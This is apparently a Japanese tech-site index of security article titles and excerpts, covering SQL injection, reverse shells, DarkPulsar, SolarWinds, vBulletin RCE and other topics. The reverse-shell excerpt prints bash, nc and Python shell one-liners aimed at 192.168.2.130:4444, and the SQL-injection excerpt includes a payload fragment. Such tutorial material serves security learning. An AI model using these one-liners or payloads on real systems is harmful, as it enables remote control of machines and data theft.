- 方向:
- 全て ウェブ3.0 バックエンド開発 ウェブフロントエンド データベース 運用・保守 開発ツール PHPフレームワーク よくある問題 他の 技術 CMS チュートリアル Java システムチュートリアル コンピューターのチュートリアル ハードウェアチュートリアル モバイルチュートリアル ソフトウェアチュートリアル モバイル ゲームのチュートリアル
- 分類する:
-
- SQLインジェクションにはどのような種類がありますか?
- はじめに SQL インジェクション攻撃手法は、データベースから返されたコンテンツを処理するアプリケーションに基づいて、明示的インジェクション、エラー インジェクション、ブラインド インジェクションに分類できます。明示的インジェクション攻撃者は、現在のインターフェイスのコンテンツから必要なコンテンツを直接取得できます。エラー挿入データベース クエリによって返された結果はページには表示されませんが、アプリケーションはデータベース エラー情報をページに出力するため、攻撃者はデータベース エラー ステートメントを作成し、エラー情報から目的のコンテンツを取得できます。ブラインド インジェクション データベース クエリの結果は、直感的なページからは取得できず、攻撃者はデータベース ロジックを使用するか、データベース ライブラリの実行を遅延させることで、目的のコンテンツを取得します。 MySQL 手動インジェクション複合インジェクション?id=1'orderby4--
- 安全性 2372 2023-05-18 22:05:12
-
- リバウンドシェルとは何ですか?
- 1.bash リバウンド bash-i>&/dev/tcp/ip_address/port0>&12.nc リバウンド nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.
- 安全性 2472 2023-05-18 22:01:04
-
- NSAの新しいAPTフレームワークDarkPulsarの使い方
- 序文 2017 年 3 月、ShadowBrokers は、DanderSpritz と FuzzBunch という 2 つのフレームワークを含む機密文書を公開し、世界に衝撃を与えました。 DanderSpritz は完全にプラグインで構成されており、情報を収集し、脆弱性を悪用し、乗っ取られたデバイスを操作するために使用されます。これは Java で書かれており、ボットネット管理パネルに似たグラフィカル インターフェイスと、Metasploit ツールに似たコントロール パネルを提供します。また、FuzzBunch によって制御されていないデバイス用のバックドアとプラグインも組み込まれています。 DanderSprit インターフェイスの概要 Fuzzbunch は、さまざまなタイプのプラグインを含む、さまざまなユーティリティが相互作用して連携するためのフレームワークを提供します。
- 安全性 1510 2023-05-18 20:14:58
-
- Ghostscript SAFER サンドボックス バイパスの脆弱性を分析する方法
- はじめに Ghostscript は、Adobe PostScript 言語のインタープリタ ソフトウェアです。 PostScript 言語で描画でき、PS と PDF 間の変換をサポートします。現在、Ghostscript はほとんどの Linux ディストリビューションにデフォルトでインストールされており、Unix、MacOS、Windows、その他のプラットフォームに移植されており、ImagineMagic、PythonPIL、さまざまな PDF リーダーなどのプログラムでも使用されています。脆弱性の説明 8 月 21 日、Google のセキュリティ研究者である Tavis Ormandy 氏は、複数の GhostScript の脆弱性を公開しました。
- 安全性 1998 2023-05-18 19:10:39
-
- DDCTF2019两个逆向分别是什么
- 01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"
- 安全性 1597 2023-05-18 17:13:20
-
- 制限を回避して Google の内部管理システムにアクセスした例の分析
- ある日、Google の脆弱性を調べていたところ、公開されている脆弱性から Google 独自のサービスの IP アドレスをいくつか発見しましたが、最初はこれらの IP アドレスで何ができるのか全く分かりませんでした。まずこれらの IP アドレスを確認したところ、Google の内部 IP の一部が含まれていることがさらにわかりました。最近、友人の KLSREERAM が Google の内部 IP に関連する脆弱性を報告し、別の友人の Vishnu が Google のサブドメインを使用してコントロール パネルにアクセスする脆弱性を報告したことを突然思い出しました。現在、両方の脆弱性は Google によって修正されており、これら 2 つの脆弱性に関連する内部 IP アドレスにはインターネットからアクセスできません。しかし今、目の前にいくつかの内部 Google IP アドレスがあるので、それができるかどうかを確認する方法を見つけなければなりません。
- 安全性 1223 2023-05-18 15:19:49
-
- Disk Pulse Enterprise Windowアプリケーションの脆弱性解析の実施方法
- 1. 脆弱性の概要 DiskPulseEnterprise はディスクの変更を監視するソフトウェアであり、管理ポート 9120 または Web 管理ウィンドウ 80 を介してソフトウェアに接続して管理し、ディスクの変更を監視できます。 DiskPulse Enterprise にはダイナミック リンク ライブラリ libspp.dll があり、これには HTTP 操作を担当するいくつかの関数が含まれています。この問題はこのダイナミック リンク ライブラリで発生します。ポスト データを処理する際、ポスト データの長さは厳密に制御されていないため、取得したデータを実行すると、無効なメモリにデータをコピーしてバッファオーバーフローを引き起こし、SEHの異常動作処理を引き起こし、最終的にはEIPを制御して任意のコードを実行させます。ソフトウェアのダウンロードリンク:h
- 安全性 1234 2023-05-18 15:04:07
-
- APP クラッシュの主な原因は何ですか?
- 1. どのようなシナリオがクラッシュ問題を引き起こす可能性がありますか? 最近、私はどのような問題がクラッシュを引き起こす可能性があるのか、つまり異常な思考を持っているのかについて考えています。 「ちょうど 2 日前。『ポリス』で、主人公のジョン・ノーランが逃走者の車をパトカーで止めるのに失敗し、逃走者が逃走するシーンがあります。このシーンとテストとの関係は何ですか?」まず第一に、普通の人は道路を運転するときに他人との衝突を避けます。これは機能をテストする主要なプロセスのようなもので、ランダムな入力は行いませんが、警察官は違います。彼は捕まえるために必要なことは何でもします。すべての方法、これはテストプロセス中に機能を使いにくくするためにどのように操作するかを考える異常な思考のようなものです。ガイド1. 異常動作 各種異常動作
- 安全性 2595 2023-05-18 13:55:06
-
- MySQL データベースの一般的なテクニックは何ですか?
- 1. サーバーの種類はどのように選択すればよいですか? MySQL サーバー設定ウィンドウの各パラメーターの意味は次のとおりです。 [ServerConfigurationType] このオプションは、サーバーのタイプを設定するために使用されます。このオプションの右側にある下ボタンをクリックすると、3 つのオプションが表示されます。 3 つのオプションの具体的な意味は次のとおりです。 開発マシン: このオプションは、典型的な個人用デスクトップ ワークステーションを表します。マシン上で複数のデスクトップ アプリケーションが実行されていると仮定します。最小限のシステム リソースを使用するように MySQL サーバーを構成します。 ServerMachine (サーバー): このオプションはサーバーを表します。MySQL サーバーは、FTP、ema などの他のアプリケーションと一緒に実行できます。
- 安全性 1114 2023-05-18 13:29:00
-
- SolarWinds サプライチェーン APT 攻撃事件のセキュリティ リスク分析例
- 背景 米国のトップセキュリティ企業FireEye(中国名:火炎)は12月13日、世界規模の侵入活動を発見したとの報告書を発表し、この組織をUNC2452と命名した。 APT組織はSolarWinds社に侵入し、SolarWindsOrion商用ソフトウェアアップデートパッケージに悪意のあるコードを埋め込んで配布しており、FireEyeはこれをSUNBURSTマルウェアと呼んでいた。バックドアには、ファイルの転送、ファイルの実行、システムの分析、マシンの再起動、システム サービスの無効化などの機能が含まれており、横方向の移動やデータの盗難が可能になります。 SolarWindsOrionPlatform は、強力でスケーラブルなインフラストラクチャ監視および管理プラットフォームです。
- 安全性 1250 2023-05-18 12:52:27
-
- vBulletin 5.x のリモート コード実行の脆弱性の分析例
- vBulletin コンポーネントの紹介 vBulletin は、フォーラムおよびコミュニティ公開ソフトウェアの世界的リーダーです。そのセキュリティ、強力な管理機能とスピード、および 40,000 を超えるオンライン コミュニティにサービスを提供する能力は、顧客から高く評価されています。多くの大規模フォーラムは、コミュニティとして vBulletin を選択しています。 vBulletin の公式 Web サイトに表示されている顧客リストから、有名なゲーム制作会社 EA、有名なゲーム プラットフォーム Steam、日本の大手多国籍企業ソニー、米国 NASA がすべて顧客であることがわかります。中国には、Hummingbird.com、51 Group Buying、Ocean Tribe、および数万人が vBull を使用しているその他のオンライン フォーラムなど、多くの大規模顧客もあります。
- 安全性 1467 2023-05-18 11:46:45
-
- 積極的な攻撃下で Google が Chrome のゼロデイ脆弱性を修正した例の分析
- Googleは25日、悪用が活発に行われているゼロデイ脆弱性を含む3件のセキュリティ脆弱性を修正するChromeアップデートをリリースした。これらの攻撃の詳細や、Chrome ユーザーに対して脆弱性がどのように悪用されたかは公開されていません。この攻撃は、Google の脅威分析チームのメンバーである Clement Lecigne 氏によって 2 月 18 日に発見されました。 Google 脅威分析グループは、脅威アクターのグループを調査および追跡する Google の部門です。 Chrome バージョン 80.0.3987.122 では、ゼロデイ脆弱性が修正されています。このアップデートは Windows、Mac、Linux ユーザーが利用できますが、ChromeOS、iOS、Android ユーザーも利用できます。
- 安全性 997 2023-05-18 11:25:12
-
- 署名アルゴリズムに基づくシンプルで安全な API 認証メカニズムとは何ですか?
- 私が広告システムに取り組んでいたとき、接続したほとんどのプラットフォームの広告システムはインターフェイスを承認するためにトークンを使用していることがわかりましたが、このトークンは変更されずに広告主によって提供されたものであり、これはストリーキングインターフェイスであると言えます。ただし、この種のインターフェイスには高度なセキュリティ要件はなく、悪意のある呼び出しを防止し、チャネルの ID を確認することしかできません。昨年、著者は、内部サービスのオープン インターフェイスとサードパーティ システム コールの統合承認管理を提供する API 統合承認プラットフォームについて書きました。管理インターフェイスの承認を容易にすること以外に、他の目的はありませんが、導入にはコストがかかります。これはおそらく私がこれまでに行った中で最も無意味なプロジェクトです。今回紹介した API 認証機構も、より広く使われている API インターフェース認証機構である可能性があり、筆者は以前 WeChat の決済機能を行っていたことを思い出しました。
- 安全性 1596 2023-05-18 10:49:52
-
- idaPro がアプリ復号化 lua スクリプトを分析する方法
- 前の idaPro デバッグまたはフックを通じて、xxtea 復号化キーを取得できます。署名の場合は、元のファイルを直接開くことができます。署名値: byds を確認できます。したがって、xxtea 復号化ツール (GitHub のソース コードからコンパイル可能) を使用して復号化を試みることができます。 xxtea による復号後の lua スクリプトはまだプレーンテキストではありません。以前、cocos2d フレームワークのソース コードとマスター APK のデコード結果に基づいて xxtea 暗号化が使用されていると判断し、アプリの Lua スクリプトにも署名値があり、それが xxtea 暗号化方式であることを確認しましたが、
- 安全性 1960 2023-05-18 08:34:19
-
- IPアドレスの解析と適用方法
- 1. IP アドレス 1. IPV4 は 32 ビットの 2 進数で構成されます 2. IP アドレスは 2 つの部分で構成されます: ネットワーク ビット + ホスト ビット 3. IP アドレスの分類: カテゴリ範囲ネットワーク ビットとホスト ビット A1-126 ネットワーク + メイン+ メイン + メイン B128-191 ネットワーク + ネットワーク + メイン + メイン C192-223 ネットワーク + ネットワーク + ネットワーク + メイン D224-239 マルチキャスト アドレス E240-254 科学研究 2. プライベート ネットワーク アドレス A10.0.0.0~10.255.255.255B172、 16.0 .0~172.31.255.255C192.168.0.0~192.168.255.255 3. サブネットマスク サブネットマスクは、IP アドレスのネットワークビットとホストビットを区別するために使用され、ネットワークビットは連続した 1 で表されます。
- 安全性 2166 2023-05-17 22:55:04